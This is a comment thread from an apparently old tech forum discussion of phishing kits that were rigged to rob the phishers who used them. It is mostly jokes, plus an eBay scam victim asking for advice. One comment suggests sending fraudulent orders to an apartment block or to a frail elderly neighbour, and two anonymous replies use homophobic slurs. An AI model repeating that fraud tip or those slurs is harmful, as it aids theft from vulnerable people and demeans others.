Propaganda13 (312548) | more than 6 years ago | (#22163696)

Multiple countries and banking regulations make this hard to follow.

Without actually getting money, you could use the bots to order things on the internet and get them shipped to a large apt building or your 90 year old neighbor who can't get up to answer the door.

When I worked for a mail-order sports store, there were zipcodes that they wouldn't deliver to because of fraud.

Re:Nuke the phishers (1)

mpe (36238) | more than 6 years ago | (#22165154)

What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

Are law enforcement actually interested in pursuing these kinds of criminals in the first place?

Phishing... (3, Interesting)

Derek Loev (1050412) | more than 6 years ago | (#22162766)

It's amazing how many large websites are so vulnerable to even basic attacks. SQL Injection is still rampant (a simple well-devised Google search can show you that) and many corporations leave credit card numbers unencrypted. Somebody with basic knowledge of SQL could attack a large number of organizations without any trouble. I've seen this happen to too many people for me to ever trust important information on smaller sites.

Reminds me of a Star Wars quote... (1)

Chabil Ha' (875116) | more than 6 years ago | (#22162818)

Machines making machines? How perverse!
Phishers phishing phishers, yikes!

That's... (0)

Anonymous Coward | more than 6 years ago | (#22162948)

One phisher to phish them all!

Root Cause is Obviously Greed (1)

Axe4ever (1155411) | more than 6 years ago | (#22163184)

I can understand that people do hacking for fun..to show off their programming capabilities..but these kinds of activities are forked off by greed..which causes these guys to go any way..I mean doing anything outta way to get a grab at others' grub..

It's a shame!!!

Free phishing kits with trojans (1)

kylehase (982334) | more than 6 years ago | (#22163252)

What we need are free phishing kits with trojans that report phishing sites to phishing filter databases or better yet to the administrators of the site they're trying to emulate since they'd have the most incentive to take action. The hard part is hiding the trojan and the traffic it generates.

funny (2, Funny)

timmarhy (659436) | more than 6 years ago | (#22163506)

what's the world come to when you can't trust someone selling phishing software!

Script kiddies? (0)

RobDollar (1137885) | more than 6 years ago | (#22163624)

Isn't "script kiddies" a form of inverted impartiality in the context of this, or any, summary? It's a bit ambiguous and frustrating to some in the way it only reflects the writer's point of view of who uses these programs. In the absence of a quirky and original last sentence, an anagram of "script kiddies" is "I predict kids".

Re:Script kiddies? (3, Interesting)

DigitAl56K (805623) | more than 6 years ago | (#22163786)

This is pretty much the correct usage.

From Wikipedia [wikipedia.org] :

In hacker culture, a script kiddie (occasionally script bunny, skidie, script kitty, script-running juvenile (SRJ), or similar) is a derogatory term used for an inexperienced malicious cracker who uses programs developed by others to attack computer systems, and deface websites. It is generally assumed that script kiddies are kids who lack the ability to write sophisticated hacking programs on their own,[1] and that their objective is to try to impress their friends or gain credit in underground cracker communities.

And that's exactly what's happening.

Customer support is available... (1)

fahrbot-bot (874524) | more than 6 years ago | (#22163930)

Cost:
  • $15/hour - Any major credit card.
  • $10/hour - Personal check (w/2 forms of ID).
  • $5/hour - Electronic Funds Transfer.
  • $1/hour - PayPal.

LOL N00bS!!! (0)

Anonymous Coward | more than 6 years ago | (#22164070)

Back in the BBS days people used to post credit card numbers and phone card numbers as... somebody dumb has got to take the fall for this sh...

Godphisher (1)

FreeDisk.nl (1181167) | more than 6 years ago | (#22164836)

As in any betrayal in the dark world of crime, there is only one solution. Masterphish to thief: "Now phirst you get one warning. But iph you do it again, you will sleep with the phishes..."

Rats! (1)

Fuzzypig (631915) | more than 6 years ago | (#22165322)

Just like a bunch of nasty, hungry rats caught in a trap together, they all start turning on each other. Bloody funny!

So how do you call the phished phishermen? (0)

Anonymous Coward | more than 6 years ago | (#22165348)

Mr. Brain's Faggots?

Re:So how do you call the phished phishermen? (0)

Anonymous Coward | more than 6 years ago | (#22165588)

That would be Phaggots.

[no subject] (0)

Anonymous Coward | more than 6 years ago | (#22166356)

There's always a bigger phish.

Reporting a Phisher (1)

emil10001 (985596) | more than 6 years ago | (#22166564)

I know this is a bit off topic, but it is related. I'm in the middle of trying to get rid of a phisher/scammer who won an eBay auction of mine. They took over someone else's account (eBay knows about this), bid on my item and won. Then they requested that I send the laptop to Nigeria (in the auction I explicitly stated that I would only send it to the US, Canada, and the UK). I knew that this person was a scammer, it was fairly obvious from the wrong e-mail addresses and Engrish, so I told him/her to stop bothering me. I then get a bunch of fake e-mails to me claiming to be from PayPal and eBay, saying that once I send the laptop, PayPal will release the funds. This person is deliberately preventing me from getting a refund for the auction costs from eBay, and obviously, preventing me from selling this laptop (or at least delaying it). Needless to say, I'm getting pretty annoyed with this guy.

I was able to grab what I believe to be his IP address off of the headers from a couple of e-mails that he sent to me, and found his ISP, but that's about as far as I got. I think that it is actually his IP address, but I'm not sure. My current plan is to send all communications between him and me to eBay, PayPal and the FBI, and be done with it. Any suggestions?
